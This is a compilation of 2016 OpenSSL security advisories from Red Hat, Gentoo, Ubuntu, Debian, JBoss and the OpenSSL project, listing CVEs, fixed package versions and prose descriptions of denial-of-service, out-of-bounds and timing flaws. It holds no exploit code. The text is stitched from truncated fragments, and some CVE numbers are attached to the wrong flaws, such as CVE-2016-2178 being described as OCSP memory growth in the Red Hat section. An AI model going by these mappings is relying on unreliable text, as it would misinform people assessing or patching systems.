Synopsis: Important: openssl security update Advisory ID: RHSA-2016:1940-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html Issue date: 2016-09-27 CVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 CVE-2016-2180 CVE-2016-2181 CVE-2016-2182 CVE-2016-6302 CVE-2016-6304 CVE-2016-6306 =====================================================================
- Summary:
An update for openssl is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library. A remote attacker could cause a TLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory, if it enabled OCSP stapling support. (CVE-2016-2178)
-
It was discovered that the Datagram TLS (DTLS) implementation could fail to release memory in certain cases. A malicious DTLS client could cause a DTLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory. A remote attacker could possibly use this flaw to make a DTLS server using OpenSSL to reject further packets sent from a DTLS client over an established DTLS connection. (CVE-2016-2181)
-
An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec() function. (CVE-2016-2182)
-
A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)
This update mitigates the CVE-2016-2183 issue by lowering priority of DES cipher suites so they are not preferred over cipher suites using AES. For compatibility reasons, DES cipher suites remain enabled by default and included in the set of cipher suites identified by the HIGH cipher string. Future updates may move them to MEDIUM or not enable them by default.
-
An integer underflow flaw leading to a buffer over-read was found in the way OpenSSL parsed TLS session tickets. (CVE-2016-6302)
-
Multiple integer overflow flaws were found in the way OpenSSL performed pointer arithmetic. A remote attacker could possibly use these flaws to cause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)
-
An out of bounds read flaw was found in the way OpenSSL formatted Public Key Infrastructure Time-Stamp Protocol data for printing. An attacker could possibly cause an application using OpenSSL to crash if it printed time stamp data from the attacker. A remote attacker could possibly use these flaws to crash a TLS/SSL server or client using OpenSSL. (CVE-2016-6306)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase 1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation 1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio() 1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec() 1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection 1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) 1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer 1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks 1377594 - CVE-2016-6306 openssl: certificate message OOB reads 1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
ppc64: openssl-1.0.1e-48.el6_8.3.ppc.rpm openssl-1.0.1e-48.el6_8.3.ppc64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm openssl-devel-1.0.1e-48.el6_8.3.ppc.rpm openssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm
s390x: openssl-1.0.1e-48.el6_8.3.s390.rpm openssl-1.0.1e-48.el6_8.3.s390x.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm openssl-devel-1.0.1e-48.el6_8.3.s390.rpm openssl-devel-1.0.1e-48.el6_8.3.s390x.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm openssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm openssl-static-1.0.1e-48.el6_8.3.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm openssl-perl-1.0.1e-48.el6_8.3.s390x.rpm openssl-static-1.0.1e-48.el6_8.3.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
ppc64: openssl-1.0.1e-51.el7_2.7.ppc64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le: openssl-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x: openssl-1.0.1e-51.el7_2.7.s390x.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm openssl-devel-1.0.1e-51.el7_2.7.s390.rpm openssl-devel-1.0.1e-51.el7_2.7.s390x.rpm openssl-libs-1.0.1e-51.el7_2.7.s390.rpm openssl-libs-1.0.1e-51.el7_2.7.s390x.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm openssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm openssl-static-1.0.1e-51.el7_2.7.ppc.rpm openssl-static-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x: openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm openssl-perl-1.0.1e-51.el7_2.7.s390x.rpm openssl-static-1.0.1e-51.el7_2.7.s390.rpm openssl-static-1.0.1e-51.el7_2.7.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-2177 https://access.redhat.com/security/cve/CVE-2016-2178 https://access.redhat.com/security/cve/CVE-2016-2179 https://access.redhat.com/security/cve/CVE-2016-2180 https://access.redhat.com/security/cve/CVE-2016-2181 https://access.redhat.com/security/cve/CVE-2016-2182 https://access.redhat.com/security/cve/CVE-2016-6302 https://access.redhat.com/security/cve/CVE-2016-6304 https://access.redhat.com/security/cve/CVE-2016-6306 https://access.redhat.com/security/updates/classification/#important https://www.openssl.org/news/secadv/20160922.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI xpTW7ApBLmKhVjs49DGYouI= =4VgY -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
After installing the updated packages, the httpd daemon will be restarted automatically. Additional information can be found at https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/
CVE-2016-2178
Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing
leak in the DSA code.
CVE-2016-2179 / CVE-2016-2181
Quan Luo and the OCAP audit team discovered denial of service
vulnerabilities in DTLS.
For the stable distribution (jessie), these problems have been fixed in version 1.0.1t-1+deb8u4.
For the unstable distribution (sid), these problems will be fixed soon.
Gentoo Linux Security Advisory GLSA 201612-16
https://security.gentoo.org/
Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: December 07, 2016 Bugs: #581234, #585142, #585276, #591454, #592068, #592074, #592082, #594500, #595186 ID: 201612-16
Synopsis
Multiple vulnerabilities have been found in OpenSSL, the worst of which allows attackers to conduct a time based side-channel attack.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.2j >= 1.0.2j
Description
Multiple vulnerabilities have been discovered in OpenSSL. Please review the CVE identifiers and the International Association for Cryptologic Research's (IACR) paper, "Make Sure DSA Signing Exponentiations Really are Constant-Time" for further details.
Workaround
There is no known workaround at this time.
Resolution
All OpenSSL users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.2j"
References
[ 1 ] CVE-2016-2105 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105 [ 2 ] CVE-2016-2106 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106 [ 3 ] CVE-2016-2107 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107 [ 4 ] CVE-2016-2108 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108 [ 5 ] CVE-2016-2109 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109 [ 6 ] CVE-2016-2176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176 [ 7 ] CVE-2016-2177 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177 [ 8 ] CVE-2016-2178 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178 [ 9 ] CVE-2016-2180 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180 [ 10 ] CVE-2016-2183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183 [ 11 ] CVE-2016-6304 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304 [ 12 ] CVE-2016-6305 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305 [ 13 ] CVE-2016-6306 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306 [ 14 ] CVE-2016-7052 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052 [ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time http://eprint.iacr.org/2016/594.pdf
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201612-16
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ========================================================================== Ubuntu Security Notice USN-3087-1 September 22, 2016
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in OpenSSL. This issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178)
Quan Luo discovered that OpenSSL did not properly restrict the lifetime of queue entries in the DTLS implementation. (CVE-2016-2181)
Shi Lei discovered that OpenSSL incorrectly validated division results. (CVE-2016-2182)
Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES ciphers were vulnerable to birthday attacks. (CVE-2016-2183)
Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303)
Shi Lei discovered that OpenSSL incorrectly performed certain message length checks. (CVE-2016-6306)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: libssl1.0.0 1.0.2g-1ubuntu4.4
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.20
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.37
After a standard system update you need to reboot your computer to make all the necessary changes. Description:
This release adds the new Apache HTTP Server 2.4.29 packages that are part of the JBoss Core Services offering.
This release serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.23, and includes bug fixes and enhancements. Refer to the Release Notes for information on the most significant bug fixes, enhancements and component upgrades included in this release. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):
JBCS-373 - Errata for httpd 2.4.29 GA RHEL 7
-
OpenSSL Security Advisory [22 Sep 2016]
OCSP Status Request extension unbounded memory growth (CVE-2016-6304)
Severity: High
A malicious client can send an excessively large OCSP Status Request extension. If that client continually requests renegotiation, sending a large OCSP Status Request extension each time, then there will be unbounded memory growth on the server. This will eventually lead to a Denial Of Service attack through memory exhaustion. Servers with a default configuration are vulnerable even if they do not support OCSP. Builds using the "no-ocsp" build time option are not affected.
Servers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default configuration, instead only if an application explicitly enables OCSP stapling support.
OpenSSL 1.1.0 users should upgrade to 1.1.0a OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
SSL_peek() hang on empty record (CVE-2016-6305)
Severity: Moderate
OpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an empty record. This could be exploited by a malicious peer in a Denial Of Service attack.
OpenSSL 1.1.0 users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The fix was developed by Matt Caswell of the OpenSSL development team.
SWEET32 Mitigation (CVE-2016-2183)
Severity: Low
SWEET32 (https://sweet32.info) is an attack on older block cipher algorithms that use a block size of 64 bits. In mitigation for the SWEET32 attack DES based ciphersuites have been moved from the HIGH cipherstring group to MEDIUM in OpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these ciphersuites disabled by default.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 16th August 2016 by Karthikeyan Bhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the OpenSSL development team.
OOB write in MDC2_Update() (CVE-2016-6303)
Severity: Low
An overflow can occur in MDC2_Update() either if called directly or through the EVP_DigestUpdate() function using MDC2. If an attacker is able to supply very large amounts of input data after a previous call to EVP_EncryptUpdate() with a partial block then a length check can overflow resulting in a heap corruption.
The amount of data needed is comparable to SIZE_MAX which is impractical on most platforms.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Malformed SHA512 ticket DoS (CVE-2016-6302)
Severity: Low
If a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a DoS attack where a malformed ticket will result in an OOB read which will ultimately crash.
The use of SHA512 in TLS session tickets is comparatively rare as it requires a custom server callback and ticket lookup mechanism.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
OOB write in BN_bn2dec() (CVE-2016-2182)
Severity: Low
The function BN_bn2dec() does not check the return value of BN_div_word(). This can cause an OOB write if an application uses this function with an overly large BIGNUM. This could be a problem if an overly large certificate or CRL is printed out from an untrusted source. TLS is not affected because record limits will reject an oversized certificate before it is parsed.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
OOB read in TS_OBJ_print_bio() (CVE-2016-2180)
Severity: Low
The function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is the total length the OID text representation would use and not the amount of data written. This will result in OOB reads when large OIDs are presented.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Pointer arithmetic undefined behaviour (CVE-2016-2177)
Severity: Low
Avoid some undefined pointer arithmetic
A common idiom in the codebase is to check limits in the following manner: "p + len > limit"
Where "p" points to some malloc'd data of SIZE bytes and limit == p + SIZE
"len" here could be from some externally supplied data (e.g. from a TLS message).
The rules of C pointer arithmetic are such that "p + len" is only well defined where len <= SIZE. Therefore the above idiom is actually undefined behaviour.
For example this could cause problems if some malloc implementation provides an address for "p" such that "p + len" actually overflows for values of len that are too big and therefore p + len < limit.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The fix was developed by Matt Caswell of the OpenSSL development team.
Constant time flag not preserved in DSA signing (CVE-2016-2178)
Severity: Low
Operations in the DSA signing algorithm should run in constant time in order to avoid side channel attacks. A flaw in the OpenSSL DSA implementation means that a non-constant time codepath is followed for certain operations. This has been demonstrated through a cache-timing attack to be sufficient for an attacker to recover the private DSA key.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 23rd May 2016 by César Pereida (Aalto University), Billy Brumley (Tampere University of Technology), and Yuval Yarom (The University of Adelaide and NICTA). The fix was developed by César Pereida.
DTLS buffered message DoS (CVE-2016-2179)
Severity: Low
In a DTLS connection where handshake messages are delivered out-of-order those messages that OpenSSL is not yet ready to process will be buffered for later use. Under certain circumstances, a flaw in the logic means that those messages do not get removed from the buffer even though the handshake has been completed. An attacker could force up to approx. 15 messages to remain in the buffer when they are no longer required. These messages will be cleared when the DTLS connection is closed. The default maximum size for a message is 100k. Therefore the attacker could force an additional 1500k to be consumed per connection. By opening many simulataneous connections an attacker could cause a DoS attack through memory exhaustion.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was developed by Matt Caswell of the OpenSSL development team.
DTLS replay protection DoS (CVE-2016-2181)
Severity: Low
A flaw in the DTLS replay attack protection mechanism means that records that arrive for future epochs update the replay protection "window" before the MAC for the record has been validated. This could be exploited by an attacker by sending a record for the next epoch (which does not have to decrypt or have a valid MAC), with a very large sequence number. This means that all subsequent legitimate packets are dropped causing a denial of service for a specific DTLS connection.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team. The fix was developed by Matt Caswell of the OpenSSL development team.
Certificate message OOB reads (CVE-2016-6306)
Severity: Low
In OpenSSL 1.0.2 and earlier some missing message length checks can result in OOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical DoS risk but this has not been observed in practice on common platforms.
The messages affected are client certificate, client certificate request and server certificate. As a result the attack can only be performed against a client or a server which enables client authentication.
OpenSSL 1.1.0 is not affected.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Excessive allocation of memory in tls_get_message_header() (CVE-2016-6307)
Severity: Low
